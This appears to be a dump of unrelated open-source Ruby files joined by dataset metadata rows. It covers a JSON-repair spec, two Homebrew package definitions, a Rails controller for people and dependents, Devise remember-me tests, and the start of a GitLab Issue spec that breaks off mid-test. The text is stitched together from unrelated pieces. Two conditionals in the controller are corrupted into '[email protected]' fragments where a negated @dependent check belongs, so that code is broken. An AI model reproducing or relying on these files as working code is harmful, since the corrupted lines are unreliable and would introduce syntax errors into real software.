doctor.repair('{"foo": 1E4 }').should == '{"foo": 1E4 }'
end
end
it "knows escape sequences" do
doctor.repair('{"foo": "\"" }').should == '{"foo": "\"" }'
doctor.repair('{"foo": "\\\\" }').should == '{"foo": "\\\\" }'
doctor.repair('{"foo": "\/" }').should == '{"foo": "\/" }'
doctor.repair('{"foo": "\b" }').should == '{"foo": "\b" }'
doctor.repair('{"foo": "\f" }').should == '{"foo": "\f" }'
doctor.repair('{"foo": "\n" }').should == '{"foo": "\n" }'
doctor.repair('{"foo": "\r" }').should == '{"foo": "\r" }'
doctor.repair('{"foo": "\t" }').should == '{"foo": "\t" }'
doctor.repair('{"foo": "\u4711" }').should == '{"foo": "\u4711" }'
doctor.repair('{"foo": "\ubeef" }').should == '{"foo": "\ubeef" }'
end
it "does not break on unexpected input, it tries to fix it" do
broken_json ='{"foo": ["beef" {][] senseless'
repaired_json = '{"foo": ["beef" ]}'
DrJson.new.repair(broken_json).should == repaired_json
end
it "indicates unexpected input in debug mode" do
broken_json ='{"foo": "beef" {'
lambda {DrJson.new(:debug => true).repair(broken_json)}.should raise_error DrJson::UnexpectedTokenError
end
context "pass-through behavior for real life files" do
json_files = Dir.glob("spec/fixtures/yajl-ruby/*.json")
json_files.each do |file|
describe "#{file}" do
it "is parseable with Oj: #{file}" do
Oj.load(File.read(file))
end
it "is parseable with Yajl: #{file}" do
Yajl::Parser.parse(File.read(file))
end
it "does pass through correct, real life file #{file}" do
test_file(file)
end
end
end
end
def test_file(file_name)
    json_str = File.read(file_name)
repaired = doctor.repair(json_str)
repaired.should == json_str
end
end
| 33.822857 | 107 | 0.531002 |
879ce1d6993e7b4a0e8ad1404b07e4c1ace23d83 | 570 | cask "artisan" do
version "2.4.2"
sha256 "3abdc8dc2f4db568da5405be0de36e138bb5d11ee13abac801b3c28bf29b9c45"
# github.com/artisan-roaster-scope/artisan/ was verified as official when first introduced to the cask
url "https://github.com/artisan-roaster-scope/artisan/releases/download/v#{version}/artisan-mac-#{version}.dmg"
appcast "https://github.com/artisan-roaster-scope/artisan/releases.atom"
name "Artisan"
desc "Visual scope for coffee roasters"
homepage "https://artisan-scope.org/"
depends_on macos: ">= :high_sierra"
app "Artisan.app"
end
| 35.625 | 113 | 0.764912 |
0891ed63d8bc9e80c3c83c21eddca947aff7fffa | 1,967 | class NatsServer < Formula
desc "Lightweight cloud messaging system"
homepage "https://nats.io"
url "https://github.com/nats-io/nats-server/archive/v2.1.2.tar.gz"
sha256 "2fdbda70191ba02f3e065b0d2d503236865c60e88fa4a7c7e0eae691e7e32b2d"
head "https://github.com/nats-io/nats-server.git"
bottle do
cellar :any_skip_relocation
sha256 "4edb45f19824f760294780d6b365916ee23c514acfc183d3fe9d52fbb4a189a9" => :catalina
sha256 "aa5771424fa936d191a62e0e7cdd4c3aa2bfe2ac6cd3869419015ae3808bd426" => :mojave
sha256 "48c033283b086a6540f0d26b4e0782de589b1b1e481968bdc6f96b86b3549f19" => :high_sierra
sha256 "8844b9be6d3acc703b99e66a4785dd25bd6df68ec1e205bf4d86993b54db4fdc" => :x86_64_linux
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
ENV["GO111MODULE"] = "off"
mkdir_p "src/github.com/nats-io"
ln_s buildpath, "src/github.com/nats-io/nats-server"
buildfile = buildpath/"src/github.com/nats-io/nats-server/main.go"
system "go", "build", "-v", "-o", bin/"nats-server", buildfile
end
plist_options :manual => "nats-server"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/nats-server</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
pid = fork do
exec bin/"nats-server",
"--port=8085",
"--pid=#{testpath}/pid",
"--log=#{testpath}/log"
end
sleep 3
begin
assert_match version.to_s, shell_output("curl localhost:8085")
assert_predicate testpath/"log", :exist?
ensure
Process.kill "SIGINT", pid
Process.wait pid
end
end
end
| 30.261538 | 106 | 0.661413 |
e26f0868caf07c22ec59862870e094d5495d5eb6 | 12,860 | class PeopleController < ApplicationController
include ApplicationHelper
include ErrorBubble
include VlpDoc
def new
@person = Person.new
build_nested_models
# render action: "new", layout: "form"
end
def check_qle_marriage_date
date_married = Date.parse(params[:date_val])
start_date = Date.parse('01/10/2013')
end_date = TimeKeeper.date_of_record
if start_date <= date_married && date_married <= end_date
      # Qualified
@qualified_date = true
else
# Not Qualified
@qualified_date = false
end
# else {
# var startDate = Date.parse('2013-10-01'), endDate = Date.parse(new Date()), enteredDate = Date.parse(date_value);
# return ((startDate <= enteredDate) && (enteredDate <= endDate));
# }
end
def register_employee_dependents
@family = Family.find(params[:id])
@employee_role = EmployeeRole.find(params[:id])
@family.updated_by = current_user.oim_id unless current_user.nil?
@employee_role.updated_by = current_user.oim_id unless current_user.nil?
# May need person init code here
if (@family.update_attributes(@family) && @employee_role.update_attributes(@employee_role))
@person = @employee_role.person
if params[:commit].downcase.include?('continue')
@organization = @employee_role.employer_profile.organization
@employee_role = EmployeeRole.find(params[:employee_role])
redirect_to select_plan_people_path
end
if params[:commit].downcase.include?('exit')
# Logout of session
else
redirect_to person_person_landing(@person)
end
else
      flash.now[:error] = "Please complete all required fields"
      render :new
end
end
  # Uses identifying information to return one or more matches in the employer census
def match_employer
end
def link_employer
end
def person_confirm
@person = Person.find(params[:person_id])
if params[:employer_id].to_i != 0
@employer = Employer.find(params[:employer_id])
#@employee = Employer
employee_family = Employer.where(:"id" => @employer.id).where(:"employee_families.employee.ssn" => @person.ssn).last.employee_families.last
@coverage = employee_family.dependents.present? ? "Individual + Family" : "Individual"
@coverage_flag = "I"
else
@employee = @person
end
respond_to do |format|
format.js {}
end
end
def plan_details
#add_employee_role
end
def dependent_details
add_employee_role
@employer_profile = @employee_role.employer_profile
@employer = @employer_profile.organization
@person = @employee_role.person
# @employee = @employer_profile.find_employee_by_person(@person)
# employee_family = Organization.find(@employer.id).employee_family_details(@person)
# @employee = employee_family.census_employee
build_nested_models
end
def add_employee_role
@person = Person.find(params[:person_id])
@employer_profile = Organization.find(params[:organization_id]).employer_profile
employer_census_family = @employer_profile.linkable_employee_family_by_person(@person)
#calling add_employee_role when linkable employee family present
if employer_census_family.present?
enroll_parms = {}
enroll_parms[:user] = current_user
enroll_parms[:employer_profile] = @employer_profile
enroll_parms[:ssn] = @person.ssn
enroll_parms[:last_name] = @person.last_name
enroll_parms[:first_name] = @person.first_name
enroll_parms[:gender] = @person.gender
enroll_parms[:dob] = @person.dob
enroll_parms[:name_sfx] = @person.name_sfx
enroll_parms[:name_pfx] = @person.name_pfx
enroll_parms[:hired_on] = params[:hired_on]
@employee_role, @family = Factories::EnrollmentFactory.add_employee_role(enroll_parms)
else
@employee_role = @person.employee_roles.first
@family = @person.primary_family
end
end
def add_dependents
@person = Person.find(params[:person_id])
@employer = Organization.find(params[:organization_id])
# employee_family = Organization.find(@employer.id).employee_family_details(@person)
@employee = @person.employee_roles.first
@dependent = FamilyMember.new(family: @person.primary_family)
end
def save_dependents
@person = Person.find(params[:person])
@employer = Organization.find(params[:employer])
family = @person.primary_family
member = Person.new(dependent_params)
new_dependent = FamilyMember.new(id: params[:family_member][:id], person: member)
@dependent = family.family_members.where(_id: new_dependent.id).first
if @dependent.blank?
@dependent = family.family_members.new(id: params[:family_member][:id], person: member)
respond_to do |format|
if member.save && @dependent.save
@person.person_relationships.create(kind: params[:family_member][:primary_relationship], relative_id: member.id)
family.households.first.coverage_households.first.coverage_household_members.find_or_create_by(applicant_id: params[:family_member][:id])
format.js { flash.now[:notice] = "Family Member Added." }
else
format.js { flash.now[:error_msg] = "Error in Family Member Addition. #{member.errors.full_messages}" }
end
end
else
if @dependent.update_attributes(dependent_params)
respond_to do |format|
format.js { flash.now[:notice] = "Family Member Updated." }
end
else
respond_to do |format|
format.js { flash.now[:error_msg] = "Error in Family Member Edit. #{member.errors.full_messages}" }
end
end
end
end
def remove_dependents
@person = Person.find(params[:person_id])
@employer = Organization.find(params[:organization_id])
@family = @person.primary_family
@dependent = @family.family_members.where(_id: params[:id]).first
if [email protected]?
@family_member_id = @dependent._id
if [email protected]_primary_applicant
@dependent.destroy
@person.person_relationships.where(relative_id: @dependent.person_id).destroy_all
@family.households.first.coverage_households.first.coverage_household_members.where(applicant_id: params[:id]).destroy_all
@flash = "Family Member Removed"
else
@flash = "Primary member can not be deleted"
end
else
@family_member_id = params[:id]
end
respond_to do |format|
format.js { flash.now[:notice] = @flash }
end
end
def get_census_employee(id)
CensusEmployee.find(id)
end
def update
sanitize_person_params
@person = find_person(params[:id])
clean_duplicate_addresses
@person.updated_by = current_user.oim_id unless current_user.nil?
if @person.has_active_consumer_role? && request.referer.include?("insured/families/personal")
update_vlp_documents(@person.consumer_role, 'person')
redirect_path = personal_insured_families_path
else
redirect_path = family_account_path
end
respond_to do |format|
if @person.update_attributes(person_params)
format.html { redirect_to redirect_path, notice: 'Person was successfully updated.' }
format.json { head :no_content }
else
@person.addresses = @old_addresses
if @person.has_active_consumer_role?
bubble_consumer_role_errors_by_person(@person)
@vlp_doc_subject = get_vlp_doc_subject_by_consumer_role(@person.consumer_role)
end
build_nested_models
          person_error_msgs = @person.errors.full_messages.join('<br/>') if @person.errors.present?
          format.html { redirect_to redirect_path, alert: "Person update failed. #{person_error_msgs}" }
# format.html { redirect_to edit_insured_employee_path(@person) }
format.json { render json: @person.errors, status: :unprocessable_entity }
end
end
end
def create
sanitize_person_params
@person = Person.find_or_initialize_by(encrypted_ssn: Person.encrypt_ssn(params[:person][:ssn]), date_of_birth: params[:person][:dob])
# Delete old sub documents
@person.addresses.each {|address| address.delete}
@person.phones.each {|phone| phone.delete}
@person.emails.each {|email| email.delete}
# person_params
respond_to do |format|
if @person.update_attributes(person_params)
format.html { redirect_to insured_employee_path(@person), notice: 'Person was successfully created.' }
format.json { render json: @person, status: :created, location: @person }
else
build_nested_models
format.html { render action: "new" }
format.json { render json: @person.errors, status: :unprocessable_entity }
end
end
end
def edit
@person = Person.find(params[:id])
build_nested_models
end
def show
@person = Person.find(params[:id])
@employer_profile= EmployerProfile.find_all_by_person(@person).first
build_nested_models
end
def select_plan
hbx_enrollment_id = params.require(:hbx_enrollment_id)
Caches::MongoidCache.allocate(CarrierProfile)
@person = current_user.person
@hbx_enrollment = find_hbx_enrollment(hbx_enrollment_id)
@benefit_group = @hbx_enrollment.benefit_group
@reference_plan = @hbx_enrollment.coverage_kind == 'dental' ? @benefit_group.dental_reference_plan : @benefit_group.reference_plan
@plans = @benefit_group.elected_plans.entries.collect() do |plan|
PlanCostDecorator.new(plan, @hbx_enrollment, @benefit_group, @reference_plan)
end
end
def enroll_family
@hbx_enrollment = HbxEnrollment.find(params[:hbx_enrollment_id])
end
def get_member
member = find_person(params[:id])
render partial: 'people/landing_pages/member_address', locals: {person: member}
end
private
def safe_find(klass, id)
# puts "finding #{klass} #{id}"
begin
klass.find(id)
rescue
nil
end
end
def find_person(id)
safe_find(Person, id)
end
def find_organization(id)
safe_find(Organization, id)
end
def find_hbx_enrollment(id)
safe_find(HbxEnrollment, id)
end
def build_nested_models
["home","mobile","work","fax"].each do |kind|
@person.phones.build(kind: kind) if @person.phones.select{|phone| phone.kind == kind}.blank?
end
Address::KINDS.each do |kind|
@person.addresses.build(kind: kind) if @person.addresses.select{|address| address.kind == kind}.blank?
end
["home","work"].each do |kind|
@person.emails.build(kind: kind) if @person.emails.select{|email| email.kind == kind}.blank?
end
end
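  # Drops nested address/phone/email attributes that were submitted blank so empty
  # sub-documents are not persisted, and de-duplicates repeated address rows.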
def sanitize_person_params
if person_params["addresses_attributes"].present?
person_params["addresses_attributes"].each do |key, address|
if address["city"].blank? && address["zip"].blank? && address["address_1"].blank?
params["person"]["addresses_attributes"].delete("#{key}")
end
end
params["person"]["addresses_attributes"] = person_params["addresses_attributes"].values.uniq #fix unexpected duplicate issue
end
if person_params["phones_attributes"].present?
person_params["phones_attributes"].each do |key, phone|
if phone["full_phone_number"].blank?
params["person"]["phones_attributes"].delete("#{key}")
end
end
end
if person_params["emails_attributes"].present?
person_params["emails_attributes"].each do |key, email|
if email["address"].blank?
params["person"]["emails_attributes"].delete("#{key}")
end
end
end
end
def person_params
params.require(:person).permit(*person_parameters_list)
end
def person_parameters_list
[
{ :addresses_attributes => [:kind, :address_1, :address_2, :city, :state, :zip, :id] },
{ :phones_attributes => [:kind, :full_phone_number, :id] },
{ :emails_attributes => [:kind, :address, :id] },
{ :consumer_role_attributes => [:contact_method, :language_preference, :id]},
{ :employee_roles_attributes => [:id, :contact_method, :language_preference]},
:first_name,
:middle_name,
:last_name,
:name_sfx,
:gender,
:us_citizen,
:is_incarcerated,
:language_code,
:is_disabled,
:race,
:is_consumer_role,
:is_resident_role,
:naturalized_citizen,
:eligible_immigration_status,
:indian_tribe_member,
{:ethnicity => []},
:tribal_id,
:no_dc_address,
:no_dc_address_reason,
:id
]
end
def dependent_params
params.require(:family_member).reject{|k, v| k == "id" or k =="primary_relationship"}.permit!
end
def clean_duplicate_addresses
@old_addresses = @person.addresses
@person.addresses = [] #fix unexpected duplicates issue
end
end
| 32.890026 | 147 | 0.689658 |
d592dc52256aa2cbb21ff1c118286a186559db9e | 8,343 | require 'test_helper'
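# Shared rememberable examples, mixed into both the token-based (Admin) and
# salt-based (User) test cases below.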
module SharedRememberableTest
extend ActiveSupport::Testing::Declarative
test 'should respond to remember_me attribute' do
assert resource_class.new.respond_to?(:remember_me)
assert resource_class.new.respond_to?(:remember_me=)
end
test 'forget_me should clear remember_created_at' do
resource = create_resource
resource.remember_me!
assert_not resource.remember_created_at.nil?
resource.forget_me!
assert resource.remember_created_at.nil?
end
  test 'remember is expired if no created_at timestamp is set' do
assert create_resource.remember_expired?
end
test 'serialize should return nil if no resource is found' do
assert_nil resource_class.serialize_from_cookie([0], "123")
end
test 'remember me return nil if is a valid resource with invalid token' do
resource = create_resource
assert_nil resource_class.serialize_from_cookie([resource.id], "123")
end
test 'remember for should fallback to devise remember for default configuration' do
swap Devise, :remember_for => 1.day do
resource = create_resource
resource.remember_me!
assert_not resource.remember_expired?
end
end
test 'remember expires at should sum date of creation with remember for configuration' do
swap Devise, :remember_for => 3.days do
resource = create_resource
resource.remember_me!
assert_equal 3.days.from_now.to_date, resource.remember_expires_at.to_date
Devise.remember_for = 5.days
assert_equal 5.days.from_now.to_date, resource.remember_expires_at.to_date
end
end
test 'remember should be expired if remember_for is zero' do
swap Devise, :remember_for => 0.days do
Devise.remember_for = 0.days
resource = create_resource
resource.remember_me!
assert resource.remember_expired?
end
end
test 'remember should be expired if it was created before limit time' do
swap Devise, :remember_for => 1.day do
resource = create_resource
resource.remember_me!
resource.remember_created_at = 2.days.ago
resource.save
assert resource.remember_expired?
end
end
  test 'remember should not be expired if it was created within the limit time' do
swap Devise, :remember_for => 30.days do
resource = create_resource
resource.remember_me!
resource.remember_created_at = (30.days.ago + 2.minutes)
resource.save
assert_not resource.remember_expired?
end
end
test 'if extend_remember_period is false, remember_me! should generate a new timestamp if expired' do
swap Devise, :remember_for => 5.minutes do
resource = create_resource
resource.remember_me!(false)
assert resource.remember_created_at
resource.remember_created_at = old = 10.minutes.ago
resource.save
resource.remember_me!(false)
assert_not_equal old.to_i, resource.remember_created_at.to_i
end
end
test 'if extend_remember_period is false, remember_me! should not generate a new timestamp' do
swap Devise, :remember_for => 1.year do
resource = create_resource
resource.remember_me!(false)
assert resource.remember_created_at
resource.remember_created_at = old = 10.minutes.ago.utc
resource.save
resource.remember_me!(false)
assert_equal old.to_i, resource.remember_created_at.to_i
end
end
test 'if extend_remember_period is true, remember_me! should always generate a new timestamp' do
swap Devise, :remember_for => 1.year do
resource = create_resource
resource.remember_me!(true)
assert resource.remember_created_at
resource.remember_created_at = old = 10.minutes.ago
resource.save
resource.remember_me!(true)
assert_not_equal old, resource.remember_created_at
end
end
end
class RememberableTest < ActiveSupport::TestCase
include SharedRememberableTest
def resource_class
Admin
end
def create_resource
create_admin
end
test 'remember_me should generate a new token and save the record without validating' do
admin = create_admin
admin.expects(:valid?).never
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
assert_not admin.changed?
end
test 'forget_me should clear remember token and save the record without validating' do
admin = create_admin
admin.remember_me!
assert_not admin.remember_token.nil?
admin.expects(:valid?).never
admin.forget_me!
assert admin.remember_token.nil?
assert_not admin.changed?
end
test 'serialize into cookie' do
admin = create_admin
admin.remember_me!
assert_equal [admin.to_key, admin.remember_token], Admin.serialize_into_cookie(admin)
end
test 'serialize from cookie' do
admin = create_admin
admin.remember_me!
assert_equal admin, Admin.serialize_from_cookie(admin.to_key, admin.remember_token)
end
test 'if remember_across_browsers is true, remember_me! should create a new token if no token exists' do
swap Devise, :remember_across_browsers => true, :remember_for => 1.year do
admin = create_admin
assert_equal nil, admin.remember_token
admin.remember_me!
assert_not_equal nil, admin.remember_token
end
end
test 'if remember_across_browsers is true, remember_me! should create a new token if a token exists but has expired' do
swap Devise, :remember_across_browsers => true, :remember_for => 1.day do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 2.days.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
end
end
test 'if remember_across_browsers is true, remember_me! should not create a new token if a token exists and has not expired' do
swap Devise, :remember_across_browsers => true, :remember_for => 2.days do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 1.day.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_equal token, admin.remember_token
end
end
test 'if remember_across_browsers is false, remember_me! should create a new token if no token exists' do
swap Devise, :remember_across_browsers => false do
admin = create_admin
assert_equal nil, admin.remember_token
admin.remember_me!
assert_not_equal nil, admin.remember_token
end
end
test 'if remember_across_browsers is false, remember_me! should create a new token if a token exists but has expired' do
swap Devise, :remember_across_browsers => false, :remember_for => 1.day do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 2.days.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
end
end
test 'if remember_across_browsers is false, remember_me! should create a new token if a token exists and has not expired' do
swap Devise, :remember_across_browsers => false, :remember_for => 2.days do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 1.day.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
end
end
end
class WithSaltRememberableTest < ActiveSupport::TestCase
include SharedRememberableTest
setup do
assert_not User.new.respond_to?(:remember_token)
end
def resource_class
User
end
def create_resource
create_user
end
test 'remember_me should not generate a new token if using salt' do
user = create_user
user.expects(:valid?).never
user.remember_me!
end
test 'forget_me should not clear remember token if using salt' do
user = create_user
user.remember_me!
user.expects(:valid?).never
user.forget_me!
end
test 'serialize into cookie' do
user = create_user
user.remember_me!
assert_equal [user.to_key, user.authenticatable_salt], User.serialize_into_cookie(user)
end
test 'serialize from cookie' do
user = create_user
user.remember_me!
assert_equal user, User.serialize_from_cookie(user.to_key, user.authenticatable_salt)
end
end
| 30.672794 | 129 | 0.730792 |
edb93ecf4b6cc5ad283ef3791874f4d128419f82 | 45,441 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Issue do
include ExternalAuthorizationServiceHelpers
using RSpec::Parameterized::TableSyntax
let_it_be(:user) { create(:user) }
let_it_be(:reusable_project) { create(:project) }
describe "Associations" do
it { is_expected.to belong_to(:milestone) }
it { is_expected.to belong_to(:iteration) }
it { is_expected.to belong_to(:project) }
it { is_expected.to have_one(:namespace).through(:project) }
it { is_expected.to belong_to(:moved_to).class_name('Issue') }
it { is_expected.to have_one(:moved_from).class_name('Issue') }
it { is_expected.to belong_to(:duplicated_to).class_name('Issue') }
it { is_expected.to belong_to(:closed_by).class_name('User') }
it { is_expected.to have_many(:assignees) }
it { is_expected.to have_many(:user_mentions).class_name("IssueUserMention") }
it { is_expected.to have_many(:designs) }
it { is_expected.to have_many(:design_versions) }
it { is_expected.to have_one(:sentry_issue) }
it { is_expected.to have_one(:alert_management_alert) }
it { is_expected.to have_many(:resource_milestone_events) }
it { is_expected.to have_many(:resource_state_events) }
it { is_expected.to have_and_belong_to_many(:prometheus_alert_events) }
it { is_expected.to have_and_belong_to_many(:self_managed_prometheus_alert_events) }
it { is_expected.to have_many(:prometheus_alerts) }
it { is_expected.to have_many(:issue_email_participants) }
describe 'versions.most_recent' do
it 'returns the most recent version' do
issue = create(:issue, project: reusable_project)
create_list(:design_version, 2, issue: issue)
last_version = create(:design_version, issue: issue)
expect(issue.design_versions.most_recent).to eq(last_version)
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Issuable) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
it { is_expected.to include_module(Taskable) }
it { is_expected.to include_module(MilestoneEventable) }
it { is_expected.to include_module(StateEventable) }
it_behaves_like 'AtomicInternalId' do
let(:internal_id_attribute) { :iid }
let(:instance) { build(:issue) }
let(:scope) { :project }
let(:scope_attrs) { { project: instance.project } }
let(:usage) { :issues }
end
end
describe 'validations' do
subject { issue.valid? }
describe 'issue_type' do
let(:issue) { build(:issue, issue_type: issue_type) }
context 'when a valid type' do
let(:issue_type) { :issue }
it { is_expected.to eq(true) }
end
context 'empty type' do
let(:issue_type) { nil }
it { is_expected.to eq(false) }
end
end
end
subject { create(:issue, project: reusable_project) }
describe 'callbacks' do
describe '#ensure_metrics' do
it 'creates metrics after saving' do
expect(subject.metrics).to be_persisted
expect(Issue::Metrics.count).to eq(1)
end
it 'does not create duplicate metrics for an issue' do
subject.close!
expect(subject.metrics).to be_persisted
expect(Issue::Metrics.count).to eq(1)
end
it 'records current metrics' do
expect_any_instance_of(Issue::Metrics).to receive(:record!)
create(:issue, project: reusable_project)
end
context 'when metrics record is missing' do
before do
subject.metrics.delete
subject.reload
subject.metrics # make sure metrics association is cached (currently nil)
end
it 'creates the metrics record' do
subject.update!(title: 'title')
expect(subject.metrics).to be_present
end
end
end
describe '#record_create_action' do
it 'records the creation action after saving' do
expect(Gitlab::UsageDataCounters::IssueActivityUniqueCounter).to receive(:track_issue_created_action)
create(:issue)
end
end
end
describe '.with_alert_management_alerts' do
subject { described_class.with_alert_management_alerts }
it 'gets only issues with alerts' do
alert = create(:alert_management_alert, project: reusable_project, issue: create(:issue, project: reusable_project))
issue = create(:issue, project: reusable_project)
expect(subject).to contain_exactly(alert.issue)
expect(subject).not_to include(issue)
end
end
describe '.simple_sorts' do
it 'includes all keys' do
expect(described_class.simple_sorts.keys).to include(
*%w(created_asc created_at_asc created_date created_desc created_at_desc
closest_future_date closest_future_date_asc due_date due_date_asc due_date_desc
id_asc id_desc relative_position relative_position_asc
updated_desc updated_asc updated_at_asc updated_at_desc))
end
end
describe '.with_issue_type' do
let_it_be(:issue) { create(:issue, project: reusable_project) }
let_it_be(:incident) { create(:incident, project: reusable_project) }
it 'gives issues with the given issue type' do
expect(described_class.with_issue_type('issue'))
.to contain_exactly(issue)
end
    it 'gives issues with the given issue types' do
expect(described_class.with_issue_type(%w(issue incident)))
.to contain_exactly(issue, incident)
end
end
describe '.order_severity' do
let_it_be(:issue_high_severity) { create(:issuable_severity, severity: :high).issue }
let_it_be(:issue_low_severity) { create(:issuable_severity, severity: :low).issue }
let_it_be(:issue_no_severity) { create(:incident) }
context 'sorting ascending' do
subject { described_class.order_severity_asc }
it { is_expected.to eq([issue_no_severity, issue_low_severity, issue_high_severity]) }
end
context 'sorting descending' do
subject { described_class.order_severity_desc }
it { is_expected.to eq([issue_high_severity, issue_low_severity, issue_no_severity]) }
end
end
describe '#order_by_position_and_priority' do
let(:project) { reusable_project }
let(:p1) { create(:label, title: 'P1', project: project, priority: 1) }
let(:p2) { create(:label, title: 'P2', project: project, priority: 2) }
let!(:issue1) { create(:labeled_issue, project: project, labels: [p1]) }
let!(:issue2) { create(:labeled_issue, project: project, labels: [p2]) }
let!(:issue3) { create(:issue, project: project, relative_position: -200) }
let!(:issue4) { create(:issue, project: project, relative_position: -100) }
it 'returns ordered list' do
expect(project.issues.order_by_position_and_priority)
.to match [issue3, issue4, issue1, issue2]
end
end
describe '#sort' do
let(:project) { reusable_project }
context "by relative_position" do
let!(:issue) { create(:issue, project: project, relative_position: nil) }
let!(:issue2) { create(:issue, project: project, relative_position: 2) }
let!(:issue3) { create(:issue, project: project, relative_position: 1) }
it "sorts asc with nulls at the end" do
issues = project.issues.sort_by_attribute('relative_position')
expect(issues).to eq([issue3, issue2, issue])
end
end
end
describe '#card_attributes' do
it 'includes the author name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => '' })
end
it 'includes the assignee name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([double(name: 'Douwe')])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => 'Douwe' })
end
end
describe '#close' do
subject(:issue) { create(:issue, project: reusable_project, state: 'opened') }
it 'sets closed_at to Time.current when an issue is closed' do
expect { issue.close }.to change { issue.closed_at }.from(nil)
end
it 'changes the state to closed' do
open_state = described_class.available_states[:opened]
closed_state = described_class.available_states[:closed]
expect { issue.close }.to change { issue.state_id }.from(open_state).to(closed_state)
end
context 'when an argument is provided' do
context 'and the argument is a User' do
it 'changes closed_by to the given user' do
expect { issue.close(user) }.to change { issue.closed_by }.from(nil).to(user)
end
end
context 'and the argument is a not a User' do
it 'does not change closed_by' do
expect { issue.close("test") }.not_to change { issue.closed_by }
end
end
end
context 'when an argument is not provided' do
it 'does not change closed_by' do
expect { issue.close }.not_to change { issue.closed_by }
end
end
end
describe '#reopen' do
let(:issue) { create(:issue, project: reusable_project, state: 'closed', closed_at: Time.current, closed_by: user) }
it 'sets closed_at to nil when an issue is reopened' do
expect { issue.reopen }.to change { issue.closed_at }.to(nil)
end
it 'sets closed_by to nil when an issue is reopened' do
expect { issue.reopen }.to change { issue.closed_by }.from(user).to(nil)
end
it 'changes the state to opened' do
expect { issue.reopen }.to change { issue.state_id }.from(described_class.available_states[:closed]).to(described_class.available_states[:opened])
end
end
describe '#to_reference' do
let(:namespace) { build(:namespace, path: 'sample-namespace') }
let(:project) { build(:project, name: 'sample-project', namespace: namespace) }
let(:issue) { build(:issue, iid: 1, project: project) }
context 'when nil argument' do
it 'returns issue id' do
expect(issue.to_reference).to eq "#1"
end
it 'returns complete path to the issue with full: true' do
expect(issue.to_reference(full: true)).to eq 'sample-namespace/sample-project#1'
end
end
context 'when argument is a project' do
context 'when same project' do
it 'returns issue id' do
expect(issue.to_reference(project)).to eq("#1")
end
it 'returns full reference with full: true' do
expect(issue.to_reference(project, full: true)).to eq 'sample-namespace/sample-project#1'
end
end
context 'when cross-project in same namespace' do
let(:another_project) do
build(:project, name: 'another-project', namespace: project.namespace)
end
it 'returns a cross-project reference' do
expect(issue.to_reference(another_project)).to eq "sample-project#1"
end
end
context 'when cross-project in different namespace' do
let(:another_namespace) { build(:namespace, id: non_existing_record_id, path: 'another-namespace') }
let(:another_namespace_project) { build(:project, path: 'another-project', namespace: another_namespace) }
it 'returns complete path to the issue' do
expect(issue.to_reference(another_namespace_project)).to eq 'sample-namespace/sample-project#1'
end
end
end
context 'when argument is a namespace' do
context 'when same as issue' do
it 'returns path to the issue with the project name' do
expect(issue.to_reference(namespace)).to eq 'sample-project#1'
end
it 'returns full reference with full: true' do
expect(issue.to_reference(namespace, full: true)).to eq 'sample-namespace/sample-project#1'
end
end
context 'when different to issue namespace' do
let(:group) { build(:group, name: 'Group', path: 'sample-group') }
it 'returns full path to the issue with full: true' do
expect(issue.to_reference(group)).to eq 'sample-namespace/sample-project#1'
end
end
end
end
describe '#assignee_or_author?' do
let(:issue) { create(:issue, project: reusable_project) }
it 'returns true for a user that is assigned to an issue' do
issue.assignees << user
expect(issue.assignee_or_author?(user)).to be_truthy
end
it 'returns true for a user that is the author of an issue' do
issue.update!(author: user)
expect(issue.assignee_or_author?(user)).to be_truthy
end
it 'returns false for a user that is not the assignee or author' do
expect(issue.assignee_or_author?(user)).to be_falsey
end
end
describe '#related_issues' do
let_it_be(:authorized_project) { create(:project) }
let_it_be(:authorized_project2) { create(:project) }
let_it_be(:unauthorized_project) { create(:project) }
let_it_be(:authorized_issue_a) { create(:issue, project: authorized_project) }
let_it_be(:authorized_issue_b) { create(:issue, project: authorized_project) }
let_it_be(:authorized_issue_c) { create(:issue, project: authorized_project2) }
let_it_be(:unauthorized_issue) { create(:issue, project: unauthorized_project) }
let_it_be(:issue_link_a) { create(:issue_link, source: authorized_issue_a, target: authorized_issue_b) }
let_it_be(:issue_link_b) { create(:issue_link, source: authorized_issue_a, target: unauthorized_issue) }
let_it_be(:issue_link_c) { create(:issue_link, source: authorized_issue_a, target: authorized_issue_c) }
before_all do
authorized_project.add_developer(user)
authorized_project2.add_developer(user)
end
it 'returns only authorized related issues for given user' do
expect(authorized_issue_a.related_issues(user))
.to contain_exactly(authorized_issue_b, authorized_issue_c)
end
it 'returns issues with valid issue_link_type' do
link_types = authorized_issue_a.related_issues(user).map(&:issue_link_type)
expect(link_types).not_to be_empty
expect(link_types).not_to include(nil)
end
it 'returns issues including the link creation time' do
dates = authorized_issue_a.related_issues(user).map(&:issue_link_created_at)
expect(dates).not_to be_empty
expect(dates).not_to include(nil)
end
it 'returns issues including the link update time' do
dates = authorized_issue_a.related_issues(user).map(&:issue_link_updated_at)
expect(dates).not_to be_empty
expect(dates).not_to include(nil)
end
describe 'when a user cannot read cross project' do
it 'only returns issues within the same project' do
